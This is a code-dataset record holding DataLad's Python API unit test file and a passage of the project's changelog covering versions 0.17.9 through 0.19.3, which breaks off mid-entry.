"alphanum_fraction": 0.6011887192726135, "avg_line_length": 37.67816162109375, "blob_id": "f69c6d47f7c77516a1f3c15142a8433aadc3407e", "content_id": "a4fbff3ab40665f5c99a69df8b1f23f590e8db66", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3365, "license_type": "permissive", "max_line_length": 99, "num_lines": 87, "path": "/datalad/tests/test_api.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-\n# vi: set ft=python sts=4 ts=4 sw=4 et:\n### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the DataLad package for the\n# copyright and license terms.\n#\n### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n'''Unit tests for Python API functionality.'''\n\nimport re\n\nfrom datalad.tests.utils_pytest import (\n SkipTest,\n assert_false,\n assert_in,\n assert_true,\n eq_,\n)\nfrom datalad.utils import get_sig_param_names\n\n\ndef test_basic_setup():\n # the import alone will verify that all default values match their\n # constraints\n from datalad import api\n\n # random pick of something that should be there\n assert_true(hasattr(api, 'install'))\n assert_true(hasattr(api, 'create'))\n # make sure all helper utilities do not pollute the namespace\n # and we end up only with __...__ attributes\n assert_false(list(filter(lambda s: s.startswith('_') and not re.match('__.*__', s), dir(api))))\n\n assert_in('Parameters', api.Dataset.install.__doc__)\n assert_in('Parameters', api.Dataset.create.__doc__)\n\n\ndef _test_consistent_order_of_args(intf, spec_posargs):\n f = getattr(intf, '__call__')\n args, kw_only = get_sig_param_names(f, ('pos_any', 'kw_only'))\n # now verify that those spec_posargs are first among args\n # TODO*: The last odd one left from \"plugins\" era. Decided to leave alone\n if intf.__name__ in ('ExtractMetadata',):\n return\n\n # if we had used * to instruct to have keyword only args, then all\n # args should actually be matched entirely\n if kw_only:\n # \"special cases/exclusions\"\n if intf.__name__ == 'CreateSiblingRia':\n # -s|--name is a mandatory option (for uniformity), so allowed to be used as posarg #2\n eq_(set(args), spec_posargs.union({'name'}))\n else:\n eq_(set(args), spec_posargs)\n else:\n # and if no kw_only -- only those which are known to be positional\n eq_(set(args[:len(spec_posargs)]), spec_posargs)\n if spec_posargs:\n # and really -- we should not even get here if there are some spec_posargs --\n # new interfaces should use * to separate pos args from kwargs per our now\n # accepted design doc:\n # http://docs.datalad.org/en/latest/design/pos_vs_kw_parameters.html\n assert False\n\n\n# TODO?: make parametric again instead of invoking\ndef test_consistent_order_of_args():\n from importlib import import_module\n\n from datalad.interface.base import get_interface_groups\n\n for grp_name, grp_descr, interfaces in get_interface_groups():\n for intfspec in interfaces:\n # turn the interface spec into an instance\n mod = import_module(intfspec[0], package='datalad')\n intf = getattr(mod, intfspec[1])\n spec = getattr(intf, '_params_', dict())\n\n # figure out which of the specs are \"positional\"\n spec_posargs = {\n name\n for name, param in spec.items()\n if param.cmd_args and not param.cmd_args[0].startswith('-')\n }\n # we have information about positional args\n _test_consistent_order_of_args(intf, spec_posargs)\n" }, { "alpha_fraction": 0.6810613870620728, "alphanum_fraction": 0.7316411137580872, "avg_line_length": 53.3068733215332, "blob_id": "a2bfa7374ef1a57a5883d563828b9e3ca937523a", "content_id": "93025041e6198b2b813aed3fdc58d0286ef6e864", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 300660, "license_type": "permissive", "max_line_length": 1057, "num_lines": 5530, "path": "/CHANGELOG.md", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "\n<a id='changelog-0.19.3'></a>\n# 0.19.3 (2023-08-10)\n\n## 🐛 Bug Fixes\n\n- Type annotate get_status_dict and note that we can pass Exception or CapturedException which is not subclass. [PR #7403](https://github.com/datalad/datalad/pull/7403) (by [@yarikoptic](https://github.com/yarikoptic))\n\n- BF: create-sibling-gitlab used to raise a TypeError when attempting a recursive operation in a dataset with uninstalled subdatasets. It now raises an impossible result instead. [PR #7430](https://github.com/datalad/datalad/pull/7430) (by [@adswa](https://github.com/adswa))\n\n- Pass branch option into recursive call within Install - for the cases whenever install is invoked with URL(s). Fixes [#7461](https://github.com/datalad/datalad/issues/7461) via [PR #7463](https://github.com/datalad/datalad/pull/7463) (by [@yarikoptic](https://github.com/yarikoptic))\n\n- Allow for reckless=ephemeral clone using relative path for the original location. Fixes [#7469](https://github.com/datalad/datalad/issues/7469) via [PR #7472](https://github.com/datalad/datalad/pull/7472) (by [@yarikoptic](https://github.com/yarikoptic))\n\n## 📝 Documentation\n\n- Fix a property name and default costs described in \"getting subdatasets\" section of `get` documentation.\n Fixes [#7458](https://github.com/datalad/datalad/issues/7458) via\n [PR #7460](https://github.com/datalad/datalad/pull/7460)\n (by [@mslw](https://github.com/mslw))\n\n## 🏠 Internal\n\n- Copy an adjusted environment only if requested to do so.\n [PR #7399](https://github.com/datalad/datalad/pull/7399)\n (by [@christian-monch](https://github.com/christian-monch))\n\n- Eliminate uses of `pkg_resources`. Fixes [#7435](https://github.com/datalad/datalad/issues/7435) via [PR #7439](https://github.com/datalad/datalad/pull/7439) (by [@jwodder](https://github.com/jwodder))\n\n## 🧪 Tests\n\n- Disable some S3 tests of their VCR taping where they fail for known issues. [PR #7467](https://github.com/datalad/datalad/pull/7467) (by [@yarikoptic](https://github.com/yarikoptic))\n\n<a id='changelog-0.19.2'></a>\n# 0.19.2 (2023-07-03)\n\n## 🐛 Bug Fixes\n\n- Remove surrounding quotes in output filenames even for newer version of annex. Fixes [#7440](https://github.com/datalad/datalad/issues/7440) via [PR #7443](https://github.com/datalad/datalad/pull/7443) (by [@yarikoptic](https://github.com/yarikoptic))\n\n## 📝 Documentation\n\n- DOC: clarify description of the \"install\" interface to reflect its convoluted behavior. [PR #7445](https://github.com/datalad/datalad/pull/7445) (by [@yarikoptic](https://github.com/yarikoptic))\n\n<a id='changelog-0.19.1'></a>\n# 0.19.1 (2023-06-26)\n\n## 🏠 Internal\n\n- Make compatible with upcoming release of git-annex (next after 10.20230407) and pass explicit core.quotepath=false to all git calls. Also added `tools/find-hanged-tests` helper.\n [PR #7372](https://github.com/datalad/datalad/pull/7372)\n (by [@yarikoptic](https://github.com/yarikoptic))\n\n## 🧪 Tests\n\n- Adjust tests for upcoming release of git-annex (next after 10.20230407) and ignore DeprecationWarning for pkg_resources for now.\n [PR #7372](https://github.com/datalad/datalad/pull/7372)\n (by [@yarikoptic](https://github.com/yarikoptic))\n\n<a id='changelog-0.19.0'></a>\n# 0.19.0 (2023-06-14)\n\n## 🚀 Enhancements and New Features\n\n- Address gitlab API special character restrictions. [PR #7407](https://github.com/datalad/datalad/pull/7407) (by [@jsheunis](https://github.com/jsheunis))\n\n- BF: The default layout of create-sibling-gitlab is now ``collection``. The previous default, ``hierarchy`` has been removed as it failed in --recursive mode in different edgecases. For single-level datasets, the outcome of ``collection`` and ``hierarchy`` is identical. [PR #7410](https://github.com/datalad/datalad/pull/7410) (by [@jsheunis](https://github.com/jsheunis) and [@adswa](https://github.com/adswa))\n\n## 🐛 Bug Fixes\n\n- WTF - bring back and extend information on metadata extractors etc, and allow for sections to have subsections and be selected at both levels [PR #7309](https://github.com/datalad/datalad/pull/7309) (by [@yarikoptic](https://github.com/yarikoptic))\n\n- BF: Run an actual git invocation with interactive commit config. [PR #7398](https://github.com/datalad/datalad/pull/7398) (by [@adswa](https://github.com/adswa))\n\n## 🔩 Dependencies\n\n- Raise minimal version of tqdm (progress bars) to v.4.32.0\n [PR #7330](https://github.com/datalad/datalad/pull/7330)\n (by [@mslw](https://github.com/mslw))\n\n## 📝 Documentation\n\n- DOC: Add a \"User messaging\" design doc. [PR #7310](https://github.com/datalad/datalad/pull/7310) (by [@jsheunis](https://github.com/jsheunis))\n\n## 🧪 Tests\n\n- Remove nose-based testing utils and possibility to test extensions using nose. [PR #7261](https://github.com/datalad/datalad/pull/7261) (by [@yarikoptic](https://github.com/yarikoptic))\n\n<a id='changelog-0.18.5'></a>\n# 0.18.5 (2023-06-13)\n\n## 🐛 Bug Fixes\n\n- More correct summary reporting for relaxed (no size) --annex. [PR #7050](https://github.com/datalad/datalad/pull/7050) (by [@yarikoptic](https://github.com/yarikoptic))\n\n- ENH: minor tune up of addurls to be more tolerant and \"informative\". [PR #7388](https://github.com/datalad/datalad/pull/7388) (by [@yarikoptic](https://github.com/yarikoptic))\n\n- Ensure that data generated by timeout handlers in the asynchronous\n runner are accessible via the result generator, even if no other\n other events occur.\n [PR #7390](https://github.com/datalad/datalad/pull/7390)\n (by [@christian-monch](https://github.com/christian-monch))\n\n- Do not map (leave as is) trailing / or \\ in github URLs. [PR #7418](https://github.com/datalad/datalad/pull/7418) (by [@yarikoptic](https://github.com/yarikoptic))\n\n## 📝 Documentation\n\n- Use `sphinx_autodoc_typehints`. Fixes [#7404](https://github.com/datalad/datalad/issues/7404) via [PR #7412](https://github.com/datalad/datalad/pull/7412) (by [@jwodder](https://github.com/jwodder))\n\n## 🏠 Internal\n\n- Discontinue ConfigManager abuse for Git identity warning. [PR #7378](https://github.com/datalad/datalad/pull/7378) (by [@mih](https://github.com/mih)) and [PR #7392](https://github.com/datalad/datalad/pull/7392) (by [@yarikoptic](https://github.com/yarikoptic))\n\n## 🧪 Tests\n\n- Boost python to 3.8 during extensions testing. [PR #7413](https://github.com/datalad/datalad/pull/7413) (by [@yarikoptic](https://github.com/yarikoptic))\n\n- Skip test_system_ssh_version if no ssh found + split parsing into separate test. [PR #7422](https://github.com/datalad/datalad/pull/7422) (by [@yarikoptic](https://github.com/yarikoptic))\n\n<a id='changelog-0.18.4'></a>\n# 0.18.4 (2023-05-16)\n\n## 🐛 Bug Fixes\n\n- Provider config files were ignored, when CWD changed between different datasets during runtime.\n Fixes [#7347](https://github.com/datalad/datalad/issues/7347) via\n [PR #7357](https://github.com/datalad/datalad/pull/7357)\n (by [@bpoldrack](https://github.com/bpoldrack))\n\n## 📝 Documentation\n\n- Added a workaround for an issue with documentation theme (search\n function not working on Read the Docs).\n Fixes [#7374](https://github.com/datalad/datalad/issues/7374) via\n [PR #7385](https://github.com/datalad/datalad/pull/7385)\n (by [@mslw](https://github.com/mslw))\n\n## 🏠 Internal\n\n- Type-annotate `datalad/support/gitrepo.py`. [PR #7341](https://github.com/datalad/datalad/pull/7341) (by [@jwodder](https://github.com/jwodder))\n\n## 🧪 Tests\n\n- Fix failing testing on CI\n [PR #7379](https://github.com/datalad/datalad/pull/7379) (by [@yarikoptic](https://github.com/yarikoptic))\n - use sample S3 url DANDI archive,\n - use our copy of old .deb from datasets.datalad.org instead of snapshots.d.o\n - use specific miniconda installer for py 3.7.\n\n<a id='changelog-0.18.3'></a>\n# 0.18.3 (2023-03-25)\n\n## 🐛 Bug Fixes\n\n- Fixed that the `get` command would fail, when subdataset source-candidate-templates where using the `path` property from `.gitmodules`.\n Also enhance the respective documentation for the `get` command.\n Fixes [#7274](https://github.com/datalad/datalad/issues/7274) via\n [PR #7280](https://github.com/datalad/datalad/pull/7280)\n (by [@bpoldrack](https://github.com/bpoldrack))\n\n- Improve up-to-dateness of config reports across manager instances. Fixes [#7299](https://github.com/datalad/datalad/issues/7299) via [PR #7301](https://github.com/datalad/datalad/pull/7301) (by [@mih](https://github.com/mih))\n\n- BF: GitRepo.merge do not allow merging unrelated unconditionally. [PR #7312](https://github.com/datalad/datalad/pull/7312) (by [@yarikoptic](https://github.com/yarikoptic))\n\n- Do not render (empty) WTF report on other records. [PR #7322](https://github.com/datalad/datalad/pull/7322) (by [@yarikoptic](https://github.com/yarikoptic))\n\n- Fixed a bug where changing DataLad's log level could lead to failing git-annex calls.\n Fixes [#7328](https://github.com/datalad/datalad/issues/7328) via\n [PR #7329](https://github.com/datalad/datalad/pull/7329)\n (by [@bpoldrack](https://github.com/bpoldrack))\n\n- Fix an issue with uninformative error reporting by the datalad special remote.\n Fixes [#7332](https://github.com/datalad/datalad/issues/7332) via\n [PR #7333](https://github.com/datalad/datalad/pull/7333)\n (by [@bpoldrack](https://github.com/bpoldrack))\n\n- Fix save to not force committing into git if reference dataset is pure git (not git-annex). Fixes [#7351](https://github.com/datalad/datalad/issues/7351) via [PR #7355](https://github.com/datalad/datalad/pull/7355) (by [@yarikoptic](https://github.com/yarikoptic))\n\n## 📝 Documentation\n\n- Include a few previously missing commands in html API docs.\n Fixes [#7288](https://github.com/datalad/datalad/issues/7288) via\n [PR #7289](https://github.com/datalad/datalad/pull/7289)\n (by [@mslw](https://github.com/mslw))\n\n## 🏠 Internal\n\n- Type-annotate almost all of `datalad/utils.py`; add `datalad/typing.py`. [PR #7317](https://github.com/datalad/datalad/pull/7317) (by [@jwodder](https://github.com/jwodder))\n\n- Type-annotate and fix `datalad/support/strings.py`. [PR #7318](https://github.com/datalad/datalad/pull/7318) (by [@jwodder](https://github.com/jwodder))\n\n- Type-annotate `datalad/support/globbedpaths.py`. [PR #7327](https://github.com/datalad/datalad/pull/7327) (by [@jwodder](https://github.com/jwodder))\n\n- Extend type-annotations for `datalad/support/path.py`. [PR #7336](https://github.com/datalad/datalad/pull/7336) (by [@jwodder](https://github.com/jwodder))\n\n- Type-annotate various things in `datalad/runner/`. [PR #7337](https://github.com/datalad/datalad/pull/7337) (by [@jwodder](https://github.com/jwodder))\n\n- Type-annotate some more files in `datalad/support/`. [PR #7339](https://github.com/datalad/datalad/pull/7339) (by [@jwodder](https://github.com/jwodder))\n\n## 🧪 Tests\n\n- Skip or xfail some currently failing or stalling tests. [PR #7331](https://github.com/datalad/datalad/pull/7331) (by [@yarikoptic](https://github.com/yarikoptic))\n\n- Skip with_sameas_remote when rsync and annex are incompatible. Fixes [#7320](https://github.com/datalad/datalad/issues/7320) via [PR #7342](https://github.com/datalad/datalad/pull/7342) (by [@bpoldrack](https://github.com/bpoldrack))\n\n- Fix testing assumption - do create pure GitRepo superdataset and test against it. [PR #7353](https://github.com/datalad/datalad/pull/7353) (by [@yarikoptic](https://github.com/yarikoptic))\n\n<a id='changelog-0.18.2'></a>\n# 0.18.2 (2023-02-27)\n\n## 🐛 Bug Fixes\n\n- Fix `create-sibling` for non-English SSH remotes by providing `LC_ALL=C` for the `ls` call. [PR #7265](https://github.com/datalad/datalad/pull/7265) (by [@nobodyinperson](https://github.com/nobodyinperson))\n\n- Fix EnsureListOf() and EnsureTupleOf() for string inputs. [PR #7267](https://github.com/datalad/datalad/pull/7267) (by [@nobodyinperson](https://github.com/nobodyinperson))\n\n- create-sibling: Use C.UTF-8 locale instead of C on the remote end. [PR #7273](https://github.com/datalad/datalad/pull/7273) (by [@nobodyinperson](https://github.com/nobodyinperson))\n\n- Address compatibility with most recent git-annex where info would exit with non-0. [PR #7292](https://github.com/datalad/datalad/pull/7292) (by [@yarikoptic](https://github.com/yarikoptic))\n\n## 🔩 Dependencies\n\n- Revert \"Revert \"Remove chardet version upper limit\"\". [PR #7263](https://github.com/datalad/datalad/pull/7263) (by [@yarikoptic](https://github.com/yarikoptic))\n\n## 🏠 Internal\n\n- Codespell more (CHANGELOGs etc) and remove custom CLI options from tox.ini. [PR #7271](https://github.com/datalad/datalad/pull/7271) (by [@yarikoptic](https://github.com/yarikoptic))\n\n## 🧪 Tests\n\n- Use older python 3.8 in testing nose utils in github-action test-nose. Fixes [#7259](https://github.com/datalad/datalad/issues/7259) via [PR #7260](https://github.com/datalad/datalad/pull/7260) (by [@yarikoptic](https://github.com/yarikoptic))\n\n<a id='changelog-0.18.1'></a>\n# 0.18.1 (2023-01-16)\n\n## 🐛 Bug Fixes\n\n- Fixes crashes on windows where DataLad was mistaking git-annex 10.20221212 for\n a not yet released git-annex version and trying to use a new feature.\n Fixes [#7248](https://github.com/datalad/datalad/issues/7248) via\n [PR #7249](https://github.com/datalad/datalad/pull/7249)\n (by [@bpoldrack](https://github.com/bpoldrack))\n\n## 📝 Documentation\n\n- DOC: fix EnsureCallable docstring. [PR #7245](https://github.com/datalad/datalad/pull/7245) (by [@matrss](https://github.com/matrss))\n\n## 🏎 Performance\n\n- Integrate buffer size optimization from datalad-next, leading to significant\n performance improvement for status and diff.\n Fixes [#7190](https://github.com/datalad/datalad/issues/7190) via\n [PR #7250](https://github.com/datalad/datalad/pull/7250)\n (by [@bpoldrack](https://github.com/bpoldrack))\n\n<a id='changelog-0.18.0'></a>\n# 0.18.0 (2022-12-31)\n\n## 💥 Breaking Changes\n\n- Move all old-style metadata commands `aggregate_metadata`, `search`, `metadata` and `extract-metadata`, as well as the `cfg_metadatatypes` procedure and the old metadata extractors into the datalad-deprecated extension.\n Now recommended way of handling metadata is to install the datalad-metalad extension instead.\n Fixes [#7012](https://github.com/datalad/datalad/issues/7012) via\n [PR #7014](https://github.com/datalad/datalad/pull/7014)\n\n- Automatic reconfiguration of the ORA special remote when cloning from RIA\n stores now only applies locally rather than being committed.\n [PR #7235](https://github.com/datalad/datalad/pull/7235)\n (by [@bpoldrack](https://github.com/bpoldrack))\n\n## 🚀 Enhancements and New Features\n\n- A repository description can be specified with a new `--description`\n option when creating siblings using `create-sibling-[gin|gitea|github|gogs]`.\n Fixes [#6816](https://github.com/datalad/datalad/issues/6816)\n via [PR #7109](https://github.com/datalad/datalad/pull/7109)\n (by [@mslw](https://github.com/mslw))\n\n- Make validation failure of alternative constraints more informative.\n Fixes [#7092](https://github.com/datalad/datalad/issues/7092) via\n [PR #7132](https://github.com/datalad/datalad/pull/7132)\n (by [@bpoldrack](https://github.com/bpoldrack))\n\n- Saving removed dataset content was sped-up, and reporting of types of removed\n content now accurately states `dataset` for added and removed subdatasets,\n instead of `file`. Moreover, saving previously staged deletions is now also\n reported.\n [PR #6784](https://github.com/datalad/datalad/pull/6784) (by [@mih](https://github.com/mih))\n\n- `foreach-dataset` command got a new possible value for the --output-streamns|--o-s\n option 'relpath' to capture and pass-through prefixing with path to subds. Very\n handy for e.g. running `git grep` command across subdatasets.\n [PR #7071](https://github.com/datalad/datalad/pull/7071)\n (by [@yarikoptic](https://github.com/yarikoptic))\n\n- New config `datalad.create-sibling-ghlike.extra-remote-settings.NETLOC.KEY=VALUE` allows to add and/or overwrite local configuration for the created sibling by the commands `create-sibling-<gin|gitea|github|gitlab|gogs>`. [PR #7213](https://github.com/datalad/datalad/pull/7213) (by [@matrss](https://github.com/matrss))\n\n- The `siblings` command does not concern the user with messages about\n inconsequential failure to annex-enable a remote anymore.\n [PR #7217](https://github.com/datalad/datalad/pull/7217)\n (by [@bpoldrack](https://github.com/bpoldrack))\n\n- ORA special remote now allows to override its configuration locally.\n [PR #7235](https://github.com/datalad/datalad/pull/7235)\n (by [@bpoldrack](https://github.com/bpoldrack))\n- Added a 'ria' special remote to provide backwards compatibility with datasets\n that were set up with the deprecated [ria-remote](https://github.com/datalad/git-annex-ria-remote).\n [PR #7235](https://github.com/datalad/datalad/pull/7235)\n (by [@bpoldrack](https://github.com/bpoldrack))\n\n## 🐛 Bug Fixes\n\n- When ``create-sibling-ria`` was invoked with a sibling name of a pre-existing sibling, a duplicate key in the result record caused a crashed.\n Fixes [#6950](https://github.com/datalad/datalad/issues/6950) via\n [PR #6952](https://github.com/datalad/datalad/pull/6952) (by [@adswa](https://api.github.com/users/adswa))\n\n## 📝 Documentation\n\n- create-sibling-ria's docstring now defines the schema of RIA URLs and clarifies internal layout of a RIA store.\n [PR #6861](https://github.com/datalad/datalad/pull/6861) (by [@adswa](https://api.github.com/users/adswa))\n\n- Move maintenance team info from issue to CONTRIBUTING.\n [PR #6904](https://github.com/datalad/datalad/pull/6904) (by [@adswa](https://api.github.com/users/adswa))\n\n- Describe specifications for a DataLad GitHub Action.\n [PR #6931](https://github.com/datalad/datalad/pull/6931) (by [@thewtex](https://api.github.com/users/thewtex))\n\n- Fix capitalization of some service names.\n [PR #6936](https://github.com/datalad/datalad/pull/6936) (by [@aqw](https://api.github.com/users/aqw))\n\n- Command categories in help text are more consistently named.\n [PR #7027](https://github.com/datalad/datalad/pull/7027) (by [@aqw](https://api.github.com/users/aqw))\n\n- DOC: Add design document on Tests and CI. [PR #7195](https://github.com/datalad/datalad/pull/7195) (by [@adswa](https://github.com/adswa))\n\n- CONTRIBUTING.md was extended with up-to-date information on CI logging, changelog and release procedures. [PR #7204](https://github.com/datalad/datalad/pull/7204) (by [@yarikoptic](https://github.com/yarikoptic))\n\n## 🏠 Internal\n\n- Allow EnsureDataset constraint to handle Path instances.\n Fixes [#7069](https://github.com/datalad/datalad/issues/7069) via\n [PR #7133](https://github.com/datalad/datalad/pull/7133)\n (by [@bpoldrack](https://github.com/bpoldrack))\n\n- Use `looseversion.LooseVersion` as drop-in replacement for `distutils.version.LooseVersion`\n Fixes [#6307](https://github.com/datalad/datalad/issues/6307) via\n [PR #6839](https://github.com/datalad/datalad/pull/6839)\n (by [@effigies](https://api.github.com/users/effigies))\n\n- Use --pathspec-from-file where possible instead of passing long lists of paths to git/git-annex calls.\n Fixes [#6922](https://github.com/datalad/datalad/issues/6922) via\n [PR #6932](https://github.com/datalad/datalad/pull/6932) (by [@yarikoptic](https://api.github.com/users/yarikoptic))\n\n- Make clone_dataset() better patchable ny extensions and less monolithic.\n [PR #7017](https://github.com/datalad/datalad/pull/7017) (by [@mih](https://api.github.com/users/mih))\n\n- Remove `simplejson` in favor of using `json`.\n Fixes [#7034](https://github.com/datalad/datalad/issues/7034) via\n [PR #7035](https://github.com/datalad/datalad/pull/7035) (by [@christian-monch](https://api.github.com/users/christian-monch))\n\n- Fix an error in the command group names-test.\n [PR #7044](https://github.com/datalad/datalad/pull/7044) (by [@christian-monch](https://api.github.com/users/christian-monch))\n\n- Move eval_results() into interface.base to simplify imports for command implementations. Deprecate use from interface.utils accordingly. Fixes [#6694](https://github.com/datalad/datalad/issues/6694) via [PR #7170](https://github.com/datalad/datalad/pull/7170) (by [@adswa](https://github.com/adswa))\n\n## 🏎 Performance\n\n- Use regular dicts instead of OrderedDicts for speedier operations. Fixes [#6566](https://github.com/datalad/datalad/issues/6566) via [PR #7174](https://github.com/datalad/datalad/pull/7174) (by [@adswa](https://github.com/adswa))\n\n- Reimplement `get_submodules_()` without `get_content_info()` for substantial performance boosts especially for large datasets with few subdatasets. Originally proposed in [PR #6942](https://github.com/datalad/datalad/pull/6942) by [@mih](https://github.com/mih), fixing [#6940](https://github.com/datalad/datalad/issues/6940). [PR #7189](https://github.com/datalad/datalad/pull/7189) (by [@adswa](https://github.com/adswa)). Complemented with [PR #7220](https://github.com/datalad/datalad/pull/7220) (by [@yarikoptic](https://github.com/yarikoptic)) to avoid `O(N^2)` (instead of `O(N*log(N))` performance in some cases.\n\n- Use --include=* or --anything instead of --copies 0 to speed up get_content_annexinfo. [PR #7230](https://github.com/datalad/datalad/pull/7230) (by [@yarikoptic](https://github.com/yarikoptic))\n\n## 🧪 Tests\n\n- Re-enable two now-passing core test on Windows CI.\n [PR #7152](https://github.com/datalad/datalad/pull/7152) (by [@adswa](https://api.github.com/users/adswa))\n\n- Remove the `with_testrepos` decorator and associated tests for it\n Fixes [#6752](https://github.com/datalad/datalad/issues/6752) via\n [PR #7176](https://github.com/datalad/datalad/pull/7176) (by [@adswa](https://api.github.com/users/adswa))\n\n<a id='changelog-0.17.10'></a>\n# 0.17.10 (2022-12-14)\n\n## 🚀 Enhancements and New Features\n\n- Enhance concurrent invocation behavior of `ThreadedRunner.run()`. If possible invocations are serialized instead of raising *re-enter* runtime errors. Deadlock situations are detected and runtime errors are raised instead of deadlocking.\n Fixes [#7138](https://github.com/datalad/datalad/issues/7138) via\n [PR #7201](https://github.com/datalad/datalad/pull/7201)\n (by [@christian-monch](https://github.com/christian-monch))\n\n- Exceptions bubbling up through CLI are now reported on including their chain\n of __cause__.\n Fixes [#7163](https://github.com/datalad/datalad/issues/7163) via\n [PR #7210](https://github.com/datalad/datalad/pull/7210)\n (by [@bpoldrack](https://github.com/bpoldrack))\n\n## 🐛 Bug Fixes\n\n- BF: read RIA config from stdin instead of temporary file. Fixes [#6514](https://github.com/datalad/datalad/issues/6514) via [PR #7147](https://github.com/datalad/datalad/pull/7147) (by [@adswa](https://github.com/adswa))\n\n- Prevent doomed annex calls on files we already know are untracked. Fixes [#7032](https://github.com/datalad/datalad/issues/7032) via [PR #7166](https://github.com/datalad/datalad/pull/7166) (by [@adswa](https://github.com/adswa))\n\n- Comply to Posix-like clone URL formats on Windows. Fixes [#7180](https://github.com/datalad/datalad/issues/7180) via [PR #7181](https://github.com/datalad/datalad/pull/7181) (by [@adswa](https://github.com/adswa))\n\n- Ensure that paths used in the datalad-url field of .gitmodules are posix. Fixes [#7182](https://github.com/datalad/datalad/issues/7182) via [PR #7183](https://github.com/datalad/datalad/pull/7183) (by [@adswa](https://github.com/adswa))\n\n- Bandaids for export-to-figshare to restore functionality. [PR #7188](https://github.com/datalad/datalad/pull/7188) (by [@adswa](https://github.com/adswa))\n\n- Fixes hanging threads when `close()` or `del` where called in `BatchedCommand` instances. That could lead to hanging tests if the tests used the `@serve_path_via_http()`-decorator\n Fixes [#6804](https://github.com/datalad/datalad/issues/6804) via\n [PR #7201](https://github.com/datalad/datalad/pull/7201)\n (by [@christian-monch](https://github.com/christian-monch))\n\n- Interpret file-URL path components according to the local operating system as described in RFC 8089. With this fix, `datalad.network.RI('file:...').localpath` returns a correct local path on Windows if the RI is constructed with a file-URL.\n Fixes [#7186](https://github.com/datalad/datalad/issues/7186) via\n [PR #7206](https://github.com/datalad/datalad/pull/7206)\n (by [@christian-monch](https://github.com/christian-monch))\n\n- Fix a bug when retrieving several files from a RIA store via SSH, when the annex key does not contain size information. Fixes [#7214](https://github.com/datalad/datalad/issues/7214) via [PR #7215](https://github.com/datalad/datalad/pull/7215) (by [@mslw](https://github.com/mslw))\n\n- Interface-specific (python vs CLI) doc generation for commands and their parameters was broken when brackets were used within the interface markups.\n Fixes [#7225](https://github.com/datalad/datalad/issues/7225) via\n [PR #7226](https://github.com/datalad/datalad/pull/7226)\n (by [@bpoldrack](https://github.com/bpoldrack))\n\n## 📝 Documentation\n\n- Fix documentation of `Runner.run()` to not accept strings. Instead, encoding\n must be ensured by the caller.\n Fixes [#7145](https://github.com/datalad/datalad/issues/7145) via\n [PR #7155](https://github.com/datalad/datalad/pull/7155)\n (by [@bpoldrack](https://github.com/bpoldrack))\n\n## 🏠 Internal\n\n- Fix import of the `ls` command from datalad-deprecated for benchmarks.\n Fixes [#7149](https://github.com/datalad/datalad/issues/7149) via\n [PR #7154](https://github.com/datalad/datalad/pull/7154)\n (by [@bpoldrack](https://github.com/bpoldrack))\n\n- Unify definition of parameter choices with `datalad clean`.\n Fixes [#7026](https://github.com/datalad/datalad/issues/7026) via\n [PR #7161](https://github.com/datalad/datalad/pull/7161)\n (by [@bpoldrack](https://github.com/bpoldrack))\n\n## 🧪 Tests\n\n- Fix test failure with old annex. Fixes [#7157](https://github.com/datalad/datalad/issues/7157) via [PR #7159](https://github.com/datalad/datalad/pull/7159) (by [@bpoldrack](https://github.com/bpoldrack))\n\n- Re-enable now passing test_path_diff test on Windows. Fixes [#3725](https://github.com/datalad/datalad/issues/3725) via [PR #7194](https://github.com/datalad/datalad/pull/7194) (by [@yarikoptic](https://github.com/yarikoptic))\n\n- Use Plaintext keyring backend in tests to avoid the need for (interactive)\n authentication to unlock the keyring during (CI-) test runs.\n Fixes [#6623](https://github.com/datalad/datalad/issues/6623) via\n [PR #7209](https://github.com/datalad/datalad/pull/7209)\n (by [@bpoldrack](https://github.com/bpoldrack))\n\n<a id='changelog-0.17.9'></a>\n# 0.17.9 (2022-11-07)\n\n## 🐛 Bug Fixes\n\n- Various small fixups ran after looking post-release and trying to build Debian package. [PR #7112](https://github.com/datalad/datalad/pull/7112) (by [@yarikoptic](https://github.com/yarikoptic))\n\n- BF: Fix add-archive-contents try-finally statement by defining variable earlier. [PR #7117](https://github.com/datalad/datalad/pull/7117) (by [@adswa](https://github.com/adswa))\n\n- Fix RIA file URL reporting in exception handling. [PR #7123](https://github.com/datalad/datalad/pull/7123) (by [@adswa](https://github.com/adswa))\n\n- HTTP download treated '429 - too many requests' as an authentication issue and\n was consequently trying to obtain credentials.\n Fixes [#7129](https://github.com/datalad/datalad/issues/7129) via\n [PR #7129](https://github.com/datalad/datalad/pull/7129)\n (by [@bpoldrack](https://github.com/bpoldrack))\n\n## 🔩 Dependencies\n\n- Unrestrict pytest and pytest-cov versions. [PR #7125](https://github.com/datalad/datalad/pull/7125) (by [@jwodder](https://github.com/jwodder))\n\n- Remove remaining references to `nose` and the implied requirement for building the documentation\n Fixes [#7100](https://github.com/datalad/datalad/issues/7100) via\n [PR #7136](https://github.com/datalad/datalad/pull/7136)\n (by [@bpoldrack](https://github.com/bpoldrack))\n\n## 🏠 Internal\n\n- Use datalad/release-action. Fixes [#7110](https://github.com/datalad/datalad/issues/7110). [PR #7111](https://github.com/datalad/datalad/pull/7111) (by [@jwodder](https://github.com/jwodder))\n\n- Fix all logging to use %-interpolation and not .format, sort imports in touched files, add pylint-ing for % formatting in log messages to `tox -e lint`. [PR #7118](https://github.com/datalad/datalad/pull/7118) (by [@yarikoptic](https://github.com/yarikoptic))\n\n## 🧪 Tests\n\n- Increase the upper time limit after which we assume that a process is stalling.\n That should reduce false positives from `datalad.support.tests.test_parallel.py::test_stalling`,\n without impacting the runtime of passing tests.\n [PR #7119](https://github.com/datalad/datalad/pull/7119)\n (by [@christian-monch](https://github.com/christian-monch))\n\n- XFAIL a check on length of results in test_gracefull_death. [PR #7126](https://github.com/datalad/datalad/pull/7126) (by [@yarikoptic](https://github.com/yarikoptic))\n\n- Configure Git to allow for \"file\" protocol in tests. [PR #7130](https://github.com/datalad/datalad/pull/7130) (by 